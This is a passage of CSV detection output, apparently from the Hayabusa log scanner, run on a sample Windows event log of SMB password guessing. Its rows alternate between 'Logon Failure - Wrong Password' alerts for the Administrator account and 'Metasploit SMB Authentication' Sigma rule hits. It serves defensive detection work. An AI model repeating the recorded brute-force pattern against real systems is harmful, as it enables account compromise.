NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UfUsAYWilbwMScpE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22ZSltGNwIl0DNDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IYwG9IUpdk5DmM8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a8kbGxQFHDBodGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KoLqIaO8p3k9kOkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUnonSx3ZBdkyGhu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: d1QJziwKhsaJljGV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZhcNRrpODYB9jZxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yi5JE53caVn7n54w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jx6qTASzFp830ud6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4L8HtBWlmAMTjCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4hVfTwibHreepku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3TlapK211UT8SO0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mzzw3uPkn2cgtmlF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aPnfUjwJei5E5BD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mm1k0eeKAYokIbDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: w8TDNcJ3LMyNtUe1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogKKslkdXvc9f130 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgoy6gMfe5N0UiP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfjf3d6I8TsBOzvc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vs8DG8s81oOwYoI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LFkgN1aDoYkQ4qrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KMwLokYpcFIYHegd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oKradBV4ERsQnKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qPzlzfmgrbYTKqQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKYlBm2lhobHzbjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: DBMu96oqO9tb3f4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO04Q3eYdzyuy51v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FrIa2UrSrfdhkDCx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axhhyMrGl95O16Vg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atjvfi8QeEDluhL2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HPBZKUiiKeyQwSr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2SmitfyjO4mxqw5E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nrq1g8ktTQbPTXqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 943GV3t1muba5IQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPVd28zf85AxdGqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: D6evoSSxcKkHspuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C4fznmrnIdUH7DzG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwrrYjUV41P0K5Jh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4RBZrALEnH5BKP9 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LU6uWH4gs4iHP7rV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCfhZDAH8ufk77zN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TE9pw4UeRldGeKVc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8PKE05MqxE5TwXT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GIE5fmddOPBbCM3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pveyo4Czx6KWKCGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
